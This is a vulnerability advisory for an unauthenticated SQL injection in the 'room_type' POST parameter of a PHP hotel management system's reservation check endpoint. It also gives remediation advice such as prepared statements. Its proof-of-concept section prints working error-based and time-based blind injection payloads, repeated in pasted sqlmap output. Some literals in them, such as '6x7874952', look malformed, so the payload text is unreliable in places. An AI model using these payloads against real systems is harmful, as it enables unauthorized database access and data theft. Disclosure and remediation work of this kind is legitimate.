# SourceCoder Hotel Management System SQL Injection Vulnerability Summary ## Vulnerability Overview * **Vulnerability Name**: SourceCoder Hotel Management System `/index.php/reservation/check` SQL Injection * **Vulnerability Type**: SQL Injection * **Affected Product**: PHP hotel management system developed using the CodeIgniter framework * **Vulnerable Location**: `/index.php/reservation/check` file * **Trigger Parameter**: `room_type` (POST request) * **Exploitation Condition**: No login or authorization required for exploitation * **Root Cause**: Attackers inject malicious code into the `room_type` parameter, which is directly used in SQL queries without proper sanitization or validation. ## Impact Scope * **Affected Version**: V1.0 * **Impact Description**: Attackers can leverage this vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, full system control, and even cause service disruption, posing a serious threat to system security and business continuity. ## Vulnerability Exploitation Code (POC) **Payload 1 (Error-based):** ```text Parameter: room_type (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- - Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM]) ``` **Payload 2 (Time-based blind):** ```text Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- - Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- - ``` **Key Payload from SQLMap Test Output Screenshot:** ```text POST parameter 'room_type' is vulnerable. Do you want to keep testing the others? [sqlmap] (0.6.0) used the default behavior, running in batch mode sqlmap identified the following injection point(s) with a total of 1593 HTTP(s) requests: Parameter: room_type (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- - Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM]) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- - Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- - ``` ## Remediation Measures 1. **Use Prepared Statements and Parameter Binding**: Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user input values are treated as pure data and will not be interpreted as SQL code. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats. 3. **Minimize Database User Privileges**: Ensure the account used to connect to the database has only the minimum necessary privileges. Avoid using accounts with high-level permissions (such as root or admin) for routine operations. 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.